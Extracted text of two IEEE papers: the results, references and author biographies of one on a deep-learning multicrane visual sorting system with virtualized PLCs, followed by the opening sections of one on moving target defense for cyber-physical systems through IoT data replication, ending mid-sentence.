given by the area under the precision recall rate curve for the detection results. mAP is the mean AP over all classes. The mAP value re ects the performance of the corresponding object detectors. The formulae of them aresummarized as follows: AP(%) = N/summationdisplay np(n) r(n) (15) mAP(%) =/summationtextQ qAP Q(16)where r(n)is the distance between adjacent points on the recall rate axis. p(n)is the value of the precision axis corre- sponding to the points on the recall rate axis. Nis the number of points. Qis the total number of classes. IV. E XPERIMENTS AND RESULTS A. Experimental Platform of Multicrane Visual Sorting System In a multicrane visual sorting system, the operation state, movement direction, speed, and other parameters of the con- veyor belt and cranes need to be controlled to achieve the controllability of material sorting. An experimental structure forthe multicrane visual sorting system is established, as shown in Fig. 9, which realizes closed-loop control in the industry that integrates C-PLC and AI technology. The scanning cycleof C-PLC is 100 ms according to the running programs. One F-vPLC in IPC1 is responsible for controlling one crane with EtherCAT protocol, and two F-vPLCs in IPC2 are responsible for controlling another crane with EtherCAT protocol and the conveyor belt with Modbus protocol. The scanning cycle ofF-vPLC is 20 ms. The scanning cycle of the UDP packet from C-PLC to F-vPLC is 50 ms. The servomotor is a DS5C series module, which drives the cranes to reach the position of the ma-terial. The frequency of the frequency converter in the conveyor belt system is (7.5 30 Hz). Ten C-PLCs are deployed on X86 server and one of them is applied to the visual sorting system.We present and discuss the experimental results obtained for the running performance of the visual recognition module, camera calibration module, and material sorting system as follows. B. User Interface (UI) of Multicrane Visual Sorting System The UI of the multicrane visual sorting system is shown in Fig. 10, which mainly consists of crane setting module, convey control module, vision state module, style setting module, and crane working state module. The crane setting module is respon-sible for working range in the X-axis and adjusting the velocity Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3733 Fig. 10. UI of multicrane visual sorting system. and acceleration of the crane. Convey control module aims to control the state that includes run and stop, and the speed of the conveyor belt. The vision state module is used to monitor thecommunication connection status between C-PLC server and AI server by the indicator. Delay is the data transmission time from the camera to C-PLC server, which includes theimage transmission time from the camera to AI server, the visual processing time on AI server, and the result transmission from AI server to C-PLC server. The style setting module isdesigned to place materials in arbitrary shape for each crane according to customer requirements. The crane working state module dynamically displays the current position and movementof the crane along the X-axis in real time. UI is used to monitor the running status of the whole multicrane system and facilitate the user to set the parameters of the system. C. Results of Material Vision Detection A comparative experiment involving faster R-CNN, YOLOv3, and YOLOv5 is designed and deployed on PyTorch using NVIDIA 3090 graphics processing units. To improve the robustness of the system, data augmentation methods are utilized on the original images, including scaling, color space adjustments, and mosaic augmentation. The number ofepochs is 1000 and the batch size is 1 due to the limited dataset. Adam optimizer [43] is utilized for learning the dramatic representations. The initial learning rate is 0.001. We collect201 images that consist of red chess pieces and black chess pieces. The number of chess pieces is random in each image. More speci cally, 141 images are selected for the training set,30 images are selected for the testing set, and the other 30 images belong to the validating set. After training and testing, the precision, recall rate, and mAP are obtained on the training set, the testing set, and the validating set, which are presented in Table II. YOLOv5 achieves the best performance in terms of mAP on the training set and thevalidating set. Faster R-CNN performs similarly to YOLOv5, the precision and recall rate of which are close to 100% on the training set and the testing set. YOLOv3 is the worst one on three datasets. The overall results prove the effectiveness of YOLOv5 for object detection.TABLE II RESULTS OF FASTER R-CNN, YOLO V3,AND YOLO V5ON THE TRAINING SET,TESTING SET,AND VALIDATING SET Fig. 11. Processing time of per image on faster R-CNN, YOLOv3, and YOLOv5. The processing times per image for the three algorithms are presented in Fig. 11. Faster R-CNN and YOLOv3 consume 35.82 and 13.64 ms to obtain the position information. YOLOv5 processes one image in 12.15 ms, which is 23.67 and 1.49 ms faster than faster R-CNN and YOLOv3, respectively. This fur- ther proves the signi cant performance of YOLOv5 in themulticrane visual sorting system. Considering the accuracy and time consumption, we choose YOLOv5 as the visual recognition algorithm and use the recognition results of YOLOv5 to continuecamera calibration. Fig. 12illustrates the visual recognition performance on YOLOv5. The data on the images represent the con dencescores, each of which is the similarity of the predicted bounding box and the corresponding truth bounding box. All con dence scores are close to 1, which further demonstrates that YOLOv5performs excellently in the virtual sorting system. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3734 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 Fig. 12. Illustration of the visual recognition results based on YOLOv5. TABLE III EXAMPLE OF AAND (R,T)FOR ONECHECKBOARD ABOUT TRADITIONAL CAMERA CALIBRATION D. Results of Camera Calibration Ten 5 cm 5 cm square checkerboards are designed for training and three 5 cm 5 cm square checkerboards are used for testing. On one checkboard, there are 120 points for traditional calibration and BP with base calibration, and 437 points for BP with linear interpolation calibration. The resolution of the cam-era is 1920 1080. First, the traditional camera calibration is conducted and the parameter matrix ( A,R,T) of one checkboard is shown in Table III. Five points are presented in the world coordinate system to illustrate the performance of traditional calibration and BP without and with linear interpolation. The distance error of these ve points is shown in Table IV.(u, v) are the pixel coordinates, (X, Y ) are the truth world coordinates, and ( X /prime,Y/prime)a r et h e predicted coordinates from three algorithms. BP with linearinterpolation performs better than the traditional calibration. The average distance error of BP with linear interpolation is 0.017 cm, which is 0.041 and 0.109 cm less than that of thetraditional calibration and BP without linear interpolation, which demonstrates the effectiveness of the proposed method. The comparison between the training loss of BP neural net- work with the base calibration and linear interpolation calibra- tion is shown in Fig. 13.T h e X-axis represents 400 epochs, and the Y-axis is the MSE loss for the training dataset. We canFig. 13. MSE loss comparison of BP with and without linear interpola- tion. Fig. 14. Distance error comparison of traditional calibration, BP with- out and with linear interpolation on three images. determine that the convergence speed of linear interpolation is faster than that of base calibration. The MSE loss of the 400th epoch is 0.417 for base calibration and 0.175 for linear interpolation calibration. Therefore, linear interpolation-basedcalibration performs better than base calibration in terms of convergence speed and accuracy. The distance error comparison of traditional calibration, BP without and with linear interpolation, is presented in Fig. 14, which captures three images for testing. The X-axis shows three images that are captured in different positions and the Y-axis is the average value of the distance error for each image. BP with linear interpolation achieves the best performance, and the average distance error is 0.007 cm, which is lower by 0.067 and 0.02 cm for all images. This further proves the signi cance of BP with linear interpolation for camera calibration in the virtualsorting system. E. Experimental Results of the Whole Visual Sorting System in the Virtualized PLCs Environment After camera calibration, C-PLC receives (world coordinates, types, and timestamps) from the server and sends commands to the F-vPLCs that control the cranes to suck the materials. In the experiment, we use two kinds of chess pieces instead of theindustrial items due to the load bearing capacity of the cranes and the suction capacity of the air pumps. One crane that is responsible for sorting the red chess pieces and putting them into the red box can work in coordination with another crane that is responsible for sorting the black chess pieces and puttingthem into the black box. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3735 TABLE IV DISTANCE ERROR OF TRADITIONAL CALIBRATION ,B PW ITHOUT AND WITHLINEAR INTERPOLATION Fig. 15. Undetected rate of red chesses and black chesses under different conveyor belt speeds. Fig. 16. Accuracy and time requirements of the multicrane sorting system under different conveyor belt speeds. The undetected rates of red and black chess pieces are shown in Fig. 15. The performance is compared under different con- veyor belt speeds, which are set to 1.5, 2.8, 4.0, and 5.2 m/min. A total of 200 chess pieces are placed on the conveyor belt for one test. There are 100 red chess pieces and 100 black chess pieces.The performance of the crane sorting system gradually degrades Fig. 17. Experimental diagram of the crane visual sorting system. with increasing speed. The best undetected rate result is 0.035, which is obtained under a speed of 1.5 m/min and is 0.07 lower than the undetected rate of 5.2 m/min. The working process of the mechanical arm includes acceleration and deceleration, whichcauses jitter. The reason for missed detections is that the crane cannot pick up all chess pieces if the conveyor belt is running too fast. Hence, the stability and reliability of the crane systemshould be improved in the fast-running scene, especially with more materials that need to be sorted on the conveyor belt. The accuracy and time requirements of the whole crane sort- ing system under different conveyor belt speeds are shown in Fig. 16. The accuracy is the ratio of the number of correctly detected chess pieces to 200. The time is calculated by the timeconsumed for sorting 200 chesses for one testing result. The best accuracy performance at 1.5 m/min is 96.5%, which is 7% higher than the accuracy achieved at 5.2 m/min. The time spentunder 1.5 m/min is 3.424 s, which is an increase of 1.115 s over the time spent at 5.2 m/min. The time to extract each chess piece is approximately 3.432 s when the belt is moving at 1.5 m/min, which satis es most industrial applications. With the increase in speed, the accuracy and time present opposite trends, thereason for which is the same as that of the undetected rate. The Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3736 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 main in uencing factors are the movement process of the me- chanical arm, which leads to massive jitter, and the fact that the air pump cannot support the amount of needed air in the fast- sorting scene. We can appropriately adjust the running speed to meet industrial requirements according to realistic applications. The experimental results of the crane visual sorting system are shown in Fig. 17. Two kinds of chess pieces are correctly sorted into the designated boxes in real time. V. C ONCLUSION In this article, a multicrane visual sorting system based on deep learning with virtualized PLCs was investigated, where two cranes can cooperate to sort materials on a conveyor belt in real time. C-PLCs and F-vPLCs were employed in the cloud and the eld to assist the cooperation of two cranes in a TSN envi- ronment to achieve highly reliable and stable communication. A YOLOv5-based visual recognition architecture was introduced to locate the materials and obtain their types. To determine the precise coordinates of the materials in the crown coordinate sys- tem, a new linear interpolation-based BP network was proposed to provide the relation between the pixel coordinate system and the world coordinate system. We demonstrate the performance of the proposed scheme based on real sorting datasets. For future work, many potential and viable applications with intelligent algorithms can utilize the proposed scheme. We will employ C-PLC in 5G mobile edge computing [44] and control the crane visual sorting system to meet the application requirements in the industry. REFERENCE [1] R. Y . Zhong, X. Xu, E. Klotz, and S. T. Newman, Intelligent manufac- turing in the context of industry 4.0: A review, Engineering , vol. 3, no. 5, pp. 616 630, 2017. [2] C. Zhang and Y . Lu, Study on arti cial intelligence: The state of the art and future prospects, J. Ind. Inf. Integr. , vol. 23, 2021, Art. no. 100224. [3] J. Chen, K. Li, Keqin Li, P. S. Yu, and Z. Zeng, Dynamic planning of bicycle stations in dockless public bicycle-sharing system using gated graph neural network, ACM Trans. Intell. Syst. Technol. , vol. 12, no. 2, 2021, Art. no. 25. [4] A. Mahmood et al., Industrial IoT in 5G-and-beyond networks: Vision, architecture, and design trends, IEEE Trans. Ind. Inform. , vol. 18, no. 6, pp. 4122 4137, Jun. 2022. [5] X. Li, J. Wan, H.-N. Dai, M. Imran, M. Xia, and A. Celesti, A hybrid computing solution and resource scheduling strategy for edge comput- ing in smart manufacturing, IEEE Trans. Ind. Inform. , vol. 15, no. 7, pp. 4225 4234, Jul. 2019. [6] A. G. Frank, L. S. Dalenogare, and N. F. Ayala, Industry 4.0 technologies: Implementation patterns in manufacturing companies, Int. J. Prod. Econ. , vol. 210, pp. 15 26, 2019. [7] M.-F. K rner et al., Extending the automation pyramid for industrial demand response, Procedia CIRP , vol. 81, pp. 998 1003, 2019. [8] S. Biallas, J. Brauer, and S. Kowalewski, Arcade.PLC: A veri cation platform for programmable logic controllers, in Proc. IEEE/ACM 27th Int. Conf. Autom. Softw. Eng. , 2012, pp. 338 341. [9] M. A. Sehr et al., Programmable logic controllers in the context of industry 4.0, IEEE Trans. Ind. Inform. , vol. 17, no. 5, pp. 3523 3533, May 2021. [10] Y . Wang, K. Hong, J. Zou, T. Peng, and H. Yang, A CNN-based visual sorting system with cloud-edge computing for exible manufacturing sys- tems, IEEE Trans. Ind. Inform. , vol. 16, no. 7, pp. 4726 4735, Jul. 2020. [11] B. Pu, K. Li, S. Li, and N. Zhu, Automatic fetal ultrasound standard plane recognition based on deep learning and IIoT, IEEE Trans. Ind. Inform. , vol. 17, no. 11, pp. 7771 7780, Nov. 2021. [12] L. Liu et al., Deep learning for generic object detection: A survey, Int. J. Comput. Vis. , vol. 128, no. 2, pp. 261 318, 2020.[13] L. Song, W. Wu, J. Guo, and X. Li, Survey on camera calibration tech- nique, in Proc. IEEE 5th Int. Conf. Intell. Human-Mach. Syst. Cybern. , 2013, pp. 389 392. [14] S. C. Park, C. M. Park, and G. N. Wang, A PLC programming environment based on a virtual plant, Int. J. Adv. Manuf. Technol. , vol. 39, no. 11, pp. 1262 1270, 2008. [15] S. C. Park and M. Chang, Hardware-in-the-loop simulation for a produc- tion system, Int. J. Prod. Res. , vol. 50, no. 8, pp. 2321 2330, 2012. [16] T. Goldschmidt, M. K. Murugaiah, C. Sonntag, B. Schlich, S. Bial- las, and P. Weber, Cloud-based control: A multi-tenant, horizontally scalable soft-PLC, in Proc. IEEE 8th Int. Conf. Cloud Comput. , 2015, pp. 909 916. [17] W. Mahnke, S. H. Leitner, and M. Damm, OPC Uni ed Architecture . Berlin, Germany: Springer, 2009. [18] S. Kalle, N. Ameen, H. Yo, and I. Ahmed, CLIK on PLCs! Attacking control logic with decompilation and virtual PLC, in Proc. Workshop Binary Anal. Res. , 2019, pp. 1 12. [19] J. Chen, K. Li, K. Bilal, X. Zhou, K. Li, and P. S. Yu, A bi-layered parallel training architecture for large-scale convolutional neural networks, IEEE Trans. Parallel Distrib. Syst. , vol. 30, no. 5, pp. 965 976, May 2019. [20] Z. Zou et al., Object detection in 20 years: A survey, Proc. IEEE , vol. 111, no. 3, pp. 257 276, Mar. 2023. [21] J. Redmon, S. Divvala, R. Girshick, and A. Farhadi, You only look once: Uni ed, real-time object detection, in Proc. IEEE Conf. Comput. Vis. Pattern Recognit. , 2016, pp. 779 788. [22] W. Liu et al., SSD: Single shot multibox detector, in Proc. Eur. Conf. Comput. Vis. , 2016, pp. 21 37. [23] S. Ren, K. He, R. Girshick, and J. Sun, Faster R-CNN: Towards real-time object detection with region proposal networks, IEEE Trans. Pattern Anal. Mach. Intell. , vol. 39, no. 6, pp. 1137 1149, Jun. 2017. [24] C. Chen, C. Wang, B. Liu, C. He, L. Cong, and S. Wan, Edge intel- ligence empowered vehicle detection and image segmentation for au- tonomous vehicles, IEEE Trans. Intell. Transp. Syst. , to be published, doi: 10.1109/TITS.2022.3232153 . [25] Y . Song, L. Gao, X. Li, and W. Shen, A novel robotic grasp detec- tion method based on region proposal networks, Robot. Comput.-Integr. Manuf. , vol. 65, 2020, Art. no. 101963. [26] G. Jocher et al., yolov5, Code repository, 2020. [Online]. Available: https://github.com/ultralytics/yolov5 [27] Y . Hold-Geoffroy et al., A perceptual measure for deep single image cam- era calibration, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2018, pp. 2354 2363. [28] Z. Zhang, A exible new technique for camera calibration, IEEE Trans. Pattern Anal. Mach. Intell. , vol. 22, no. 11, pp. 1330 1334, Nov. 2000. [29] C. A. I. Sheng, L. I. Qing, and Q. Yan-feng, Camera calibration of attitude measurement system based on BP neural network, J. Optoelectron. Laser , vol. 18, no. 7, pp. 832 834, 2007. [30] S. N. Raza et al., Arti cial intelligence based camera calibration, inProc. 15th Int. Wireless Commun. Mobile Comput. Conf. , 2019, pp. 1564 1569. [31] S. Sudhakaran, K. Montgomery, M. Kashef, D. Cavalcanti, and R. Can- dell, Wireless time sensitive networking impact on an industrial col- laborative robotic workcell, IEEE Trans. Ind. Inform. , vol. 18, no. 10, pp. 7351 7360, Oct. 2022. [32] C. Gomez, A. Arcia-Moret, and J. Crowcroft, TCP in the Internet of Things: From ostracism to prominence, IEEE Internet Comput. , vol. 22, no. 1, pp. 29 41, Jan./Feb. 2018. [33] C. DeCusatis, R. M. Lynch, W. Kluge, J. Houston, P. A. Wojciak, and S. Guendert, Impact of cyberattacks on precision time protocol, IEEE Trans. Instrum. Meas. , vol. 69, no. 5, pp. 2172 2181, May 2020. [34] C.-Y . Wang, H.-Y . M. Liao, Y .-H. Wu, P.-Y . Chen, J.-W. Hsieh, and I.-H. Yeh, CSPNet: A new backbone that can enhance learning capability of CNN, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. Work- shops , 2020, pp. 1571 1580. [35] J. Redmon, DarkNet: Open source neural networks in C, 2013. [Online]. Available: http://pjreddie.com/darknet/ [36] S. Liu, L. Qi, H. Qin, J. Shi, and J. Jia, Path aggregation network for instance segmentation, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2018, pp. 8759 8768. [37] T.-Y . Lin, P. Dollar, R. Girshick, K. He, B. Hariharan, and S. Belongie, Feature pyramid networks for object detection, in Proc. IEEE Conf. Comput. Vis. Pattern Recognit. , 2017, pp. 936 944. [38] H. Rezato ghi, N. Tsoi, J. Gwak, A. Sadeghian, I. Reid, and S. Savarese, Generalized intersection over union: A metric and a loss for bounding box regression, in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. , 2019, pp. 658 666. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3737 [39] I. Chamveha et al., Automated cardiothoracic ratio calculation and cardiomegaly detection using deep learning approach, 2020, arXiv:2002.07468 . [40] V . Nair and G. E. Hinton, Recti ed linear units improve restricted Boltz- mann machines, in Proc. Int. Conf. Mach. Learn. , 2010, pp. 807 814. [41] M. Mathieu, C. Couprie, and Y . LeCun, Deep multi-scale video prediction beyond mean square error, 2015, arXiv:1511.05440 . [42] P. Henderson and V . Ferrari, End-to-end training of object class detectors for mean average precision, in Proc. Asian Conf. Comput. Vis. , 2016, pp. 198 213. [43] D. P. Kingma et al., Adam: A method for stochastic optimization, 2014, arXiv:1412.6980 . [44] F. Spinelli and V . Mancuso, Toward enabled industrial verticals in 5G: A survey on MEC-based approaches to provisioning and exibility, IEEE Commun. Surveys Tut. , vol. 23, no. 1, pp. 596 630, Jan./Mar. 2021. Meixia Fu received the B.S. degree in commu- nication engineering from the Qingdao Univer-sity of Science and Technology, Qingdao, China, in 2014, and the Ph.D. degree in information and communication engineering from the Bei-jing University of Posts and Telecommunica-tions, Beijing, China, in 2021. She is currently a Postdoctoral Research As- sociate with the University of Science and Tech-nology, Beijing, China. Her research interests include industrial Internet of Things, intelligent manufacturing, environmental perception, arti cial intelligence, com-puter vision, and image processing. Zhenqian Wang received the B.Eng. degree majored in intelligent science and technology during the undergraduate period in 2021 fromthe School of Automation, University of Scienceand Technology, Beijing, China, where he is currently working toward the master s degree in electronic information with the Institute of Indus-trial Internet. His current research interests include indus- trial Internet of Things, intelligent manufactur- ing, computer vision, deep learning, and depth estimation. Jianquan Wang received the doctoral degree in communication engineering from the BeijingUniversity of Posts and Telecommunications,Beijing, China, in 2003. Since 2020, he has been a Professor with the University of Science and Technology, Beijing,China. He is the leader of scienti c and techno-logical innovation of the National Ten Thousand Talents Program, the young and middle-aged leading talents of the Ministry of Science andTechnology, the expert enjoying the special al- lowance of the State Council. He presided over and participated in more than ten special projects, including 863, NSFC, major projectssupported by the Ministry of Science and Technology, National Scienceand Technology major special projects. More than 100 articles have been published, more than 40 invention patents have been authorized; more than 60 international standard manuscripts have been submitted.He is interested in researching in Industrial Internet and heterogeneousnetwork collaboration, network system, key technology, and network security. Qu Wang received the B.S. degree in informa- tion and communication engineering from the School of Software Engineering, Beijing Univer- sity of Posts and Telecommunication, Beijing,China, in 2014, the M.S. degree in informationand communication engineering from the Uni- versity of Chinese Academy of Sciences, Bei- jing, China, in 2017, and the Ph.D. degree in in-formation and communication engineering fromthe Beijing University of Posts and Telecommu- nications, Beijing, China, in 2021. He is currently an Associate Professor with the University of Science and Technology, Beijing, China. His research interests include location-based services, context awareness, pervasive computing, industrial In- ternet of Things, and arti cial intelligence. Zhangchao Ma received the bachelor s and doctor s degrees in communication engineer- ing from the Beijing University of Posts and Telecommunications, Beijing, China, in 2002and 2011, respectively. From 2017 to 2020, he was with Guoke Quan- tum Communication Network Company Ltd. From 2011 to 2017, he was with the NetworkTechnology Research Institute, China UnicomResearch Institute, Beijing. Since May 2020, he has been an Associate Professor with the Uni- versity of Science and Technology Beijing, Beijing. He has participatedin multiple funded research grants, including National Major SpecialProjects. His research interests include researching in industrial delay sensitive network, network endogenous security, quantum secure com- munication, and B5G. Danshi Wang (Senior Member, IEEE) received the Ph.D. degree in electromagnetic eld and microwave technology from the Beijing Univer-sity of Posts and Telecommunications (BUPT),Beijing, China, in 2016. He is currently an Associate Professor with the State Key Laboratory of Information Photon-ics and Optical Communications, BUPT. He hasproposed and veri ed a series of AI-driven com- munication and network technology solutions, which has been applied to telecom operator and Internet service provider. He has authored or coauthored more than 160technical papers in international journals and conference, including 20 invited talks in ECOC/ACP/OECC/ICAIT. He has held and participated in multiple funded research grants, including the National Key R&DProgram of China, National Natural Science Foundation of China, andthe Fundamental Research Funds for the Central Universities. His re- search interests include intelligent communication and network, arti cial intelligence (AI), digital twin network, and AI for science. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply.
Moving_Target_Defense_for_CyberPhysical_Systems_Using_IoT-Enabled_Data_Replication.pdf
This article proposes a novel moving target defense (MTD) strategy that leverages the versatility of the Internetof Things (IoT) networks to enhance the security of cyber physical systems (CPSs) by replicating relevant sensory andcontrol signals. The replicated data are randomly selected andtransmitted to create two layers of uncertainties that reduce theability of adversaries to launch successful cyberattacks, withoutaffecting the performance of the system in a normal operation.The theoretical foundations of designing the IoT network andoptimal allocation of replicas per signal are developed for linear-time-invariant systems, and fundamental limits of uncertaintiesintroduced by the framework are calculated. The orchestration of the layers and applications integrated in the proposed framework is demonstrated in experimental implementation on a real-timewater system over a WiFi network, adopting a data-centricarchitecture. The implementation results demonstrate that theproposed framework considerably limits the impact of false-data-injection attacks, while decreasing the ability of adversaries tolearn details about the physical system operation.
IEEE INTERNET OF THINGS JOURNAL, VOL. 9, NO. 15, 1 AUGUST 2022 13223 Moving Target Defense for Cyber Physical Systems Using IoT-Enabled Data Replication Jairo A. Giraldo ,Member, IEEE , Mohamad El Hariri ,Member, IEEE , and Masood Parvania ,Senior Member, IEEE Index Terms Cyber physical systems, cybersecurity, data replication, Internet of Things (IoT), moving target defense(MTD). I. I NTRODUCTION SECURING the computing and communication networks that monitor and control physical systems, collectively known as cyber physical systems (CPSs), is becoming a pri- ority as many systems and technologies, from the critical infrastructure (e.g., power and water networks), to cars, dronesand medical devices become more connected and controlled by software [1]. There are currently growing vulnerabilities threatening critical infrastructure CPSs, such as power plants,oil and gas pipelines, and water supplies [2], [3]. Moreover, recent sophisticated attacks have targeted industrial CPSs around the world, such as the CrashOverride incident [4], anda denial-of-service attack that left grid operators temporarily blinded to generation sites of several wind and solar farms in the U.S. [5]. One of the key factors to the success of Manuscript received 9 March 2021; revised 12 July 2021, 24 September 2021, and 13 November 2021; accepted 3 January 2022.Date of publication 20 January 2022; date of current version 25 July 2022. This work was supported in part by the Of ce of Naval Research under Grant N000141812395. (Corresponding author: Jairo A. Giraldo.) Jairo A. Giraldo and Masood Parvania are with the Department of Electrical and Computer Engineering, The University of Utah, Salt Lake City, UT 84112 USA (e-mail: [email protected]; [email protected]). Mohamad El Hariri is with the Department of Electrical Engineering, Colorado School of Mines, Golden, CO 80401 USA (e-mail: melhariri@ mines.edu). Digital Object Identi er 10.1109/JIOT.2022.3144937cyberattacks is the attackers ability to gain as much knowl- edge about the topology, architecture, and operation of the target CPS during the reconnaissance phase, which has proven effective due to the static nature of many modern-day com-puting systems [6]. The more knowledge an adversary gains, the more sophisticated and impactful attacks can be. Moving target defense (MTD) has been proposed as a secu- rity measure with the purpose of inducing control shifts and changes across multiple system dimensions in order to increase uncertainty, apparent complexity, costs for attackers, and coun-teract reconnaissance efforts [7], in order to make harder for the adversary to launch successful attacks. MTD was origi- nally developed for computer network security [8] [10], but several recent efforts have extended the MTD application to protect CPSs. A. Related Work MTD applications in CPS have been proposed in cyber and physical contexts. From a cyber perspective, different approaches have been proposed: data space randomization(DSR) that can detect various types of memory corruption attacks [11], [12]; IP-Hopping in SCADA networks to dynam- ically change the IP addresses of different devices in thenetwork [13]. A controller area network identi cation shuf- ing technique is introduced in [14] that can increase the dif culty for attackers to perform reconnaissance attacks inmodern vehicles. On the other hand, several efforts have focused on the development of theoretical foundations for dif- ferent MTD strategies that particularly affect physical signals or physical connections to reveal stealthy attacks. In smart grids, MTD approaches for state estimation have focused onchanging the physical topology of the power grid (e.g., by changing admittance) in order to reveal false-data-injection (FDI) attacks [15] [18]. Giraldo et al. [19], Giraldo and Cardenas [20] have proposed an MTD mechanism where the sensor s availability changes randomly over time, allowing the detection of stealthy attacks while limiting the disruptioncaused to the system. Similarly, the MTD strategies proposed in [21] and [22] consist of randomly switching among sev- eral controllers to increase the uncertainty perceived by theadversary. Grif oen et al. [23] included an external system unknown to the attacker that uses additional sensor readings making harder for the adversary to remain hidden. Most of the MTD approaches for CPSs found in the liter- ature focus on revealing sophisticated stealthy attacks at the 2327-4662 c/circlecopyrt2022 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See https://www.ieee.org/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. 13224 IEEE INTERNET OF THINGS JOURNAL, VOL. 9, NO. 15, 1 AUGUST 2022 cost of degrading the system performance. As a consequence, missing from prior art surveyed above are MTD approachesthat can simultaneously secure CPSs in different aspects, such as privacy and attack mitigation, without affecting the normal system operation. On the other hand, even though most effortshave introduced theoretical results to describe the potential bene ts of MTD mechanisms [19], [21] [23], little attention has been given to implementing the proposed strategies inorder to evaluate their feasibility and scalability in a realistic context. B. Contributions and Paper Organization This article proposes a novel framework for MTD using IoT-enabled data replication (MTD-IDR), which exploits the exibility and low cost of Internet of Things (IoT) devices to replicate relevant sensory and control signals from CPSs, and then randomly selects a subset of replicated data to reach their destination. The design of the proposed MTD-IDR frame-work consists of a mixed integer quadratically constrained programming (MIQCP) problem that takes into account the dynamic behavior of the physical system and the number ofavailable IoT devices to optimally allocate the number of replicas associated to each signal in order to minimize the impact of cyberattacks. In addition, the MTD-IDR frameworkintegrates two layers of uncertainty, namely, random replica activation, which selects a random subset of replicas to trans- mit at a given time, and random path selection that selectswhich one of the transmitted replicas reach their intended destination. These layers of uncertainty are able to limit the attacker s ability to learn the system model and simultane-ously reduce the impact and success probability of FDI attacks. Furthermore, the proposed MTD-IDR approach utilizes a data- centric network architecture for seamless coordination between the IoT devices, sensors and controllers, and for ensuring scalability and interoperability. The remainder of this article is organized as follows. Section II presents an overview of the proposed MTD- IDR framework, along with the description of the privatedata exchange network, random replica activation, and ran- dom path selection layers. The formulation of the optimal replica allocation model is introduced in Section III. Theproposed MTD-IDR framework is implemented and tested in Section IV on a real-time operation of a test quadruple tank process (QTP) over a WiFi network. Section V concludes thisarticle. II. MTD W ITHIOT-E NABLED DATA REPLICATION : TWOLAYERS OF UNCERTAINTY The architecture of the proposed MTD-IDR framework is shown in Fig. 1. In the proposed MTD-IDR framework, the CPS sensor signal (e.g., temperature, pressure, velocity) and control command (e.g., injected voltage, open/close of a valve)arereplicated by a group of IoT devices. The IoT-enabled data replication process is carried over the out-of-band private data exchange layer in Fig. 1, consisting of a data-centric databusthat facilitates the access of the IoT devices to source data (i.e., sensor readings or control commands). The number ofFig. 1. Architecture of the proposed MTD-IDR framework. replicas associated to each signal is optimally allocated bysolving an optimization problem that takes into account the mathematical model representing the dynamics of the phys-ical system and the total number of available IoT devices. Then, the random replica activation algorithm selects at each time instant a subset of replicas to transmit their informationover the system s control network . This intermittent data trans- mission increases the network performance, while decreasing the amount of data an adversary can gather from a speci creplica. Finally, the random path selection algorithm, located next to the intended receiver, e.g., a controller, selects one of the transmitted replicated signals that will eventually be usedby the CPS. In the proposed MTD-IDR framework, the random replica activation and path selection algorithms add two layers ofuncertainty that make it harder for adversaries to learn the system model (reconnaissance), and reduce the impact and success probability of FDI attacks. Furthermore, the proposed MTD-IDR solution does not induce any performance degra- dation to the physical system, as compared to existingMTD approaches [19] [23]. The details of the private data exchange interface, control network vulnerabilities, random replica activation, and random path selection are presentedin Sections II-A II-D, respectively. The replica allocation algorithm is described in Section III. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:16 UTC from IEEE Xplore. Restrictions apply. GIRALDO et al. : MOVING TARGET DEFENSE FOR CYBER PHYSICAL SYSTEMS 13225 A. Private Data Exchange Network The private data exchange network in Fig. 1 is an out-of- band network that is isolated from the main control network. Inthe proposed MTD-IDR framework, devices and replicas each have two network interfaces: one to connect to the control network and the other to the private data exchange network.In order to guarantee high network performance, even with large data volumes as the CPS system expands, the private data exchange is based on a data-centric messaging scheme(utilizing a databus), and follows the peer-to-peer publish subscribe communication scheme [24], [25]. The publish subscribe scheme enables the information streams (instances) to be reliably disseminated to several applications (repli- cas), while maintaining adequate network performance. Afterselecting the number of replicas and de ning a shared data model, devices are able to publish keyed updated instances of that model (based on their respective ID), while repli-cas lter their subscriptions to the data based on those keys. Using keys eliminates the need for duplicating data structures, and is an example of data ltering that the adopted databusprovides. B. Control and Communication Network Vulnerability Recall that the private data exchange corresponds to an out- of-band network that cannot be accessed externally. However, the control network is in charge of transmitting the information from each replica to the intended destination (e.g., controller),making it susceptible to cyber attackers. Conventional com- munication networks for industrial applications are based on protocols, such as Modbus and DNP3, which are vulnerable to cyberattacks due to their lack of authentication and encryp- tion [26], [27]. Besides, the nature of such protocols is basedon client server communications, where devices communicate with a single server, which, from a security point of view, can create bottlenecks and single point of failures. However, wepropose the use of a data-centric architecture (similar to the private data exchange), which uses a fully distributed publish subscriber communications where data are always availableonly to those applications that need it and that have the ade- quate access ID. For security-critical applications, data-centric communications can control access, enforce data ow paths,and encrypt data on-the- y. These signi cantly increase the dif culty for adversaries to gain access to the information and compromise it. Even though data-centric communica-tions offer stronger security 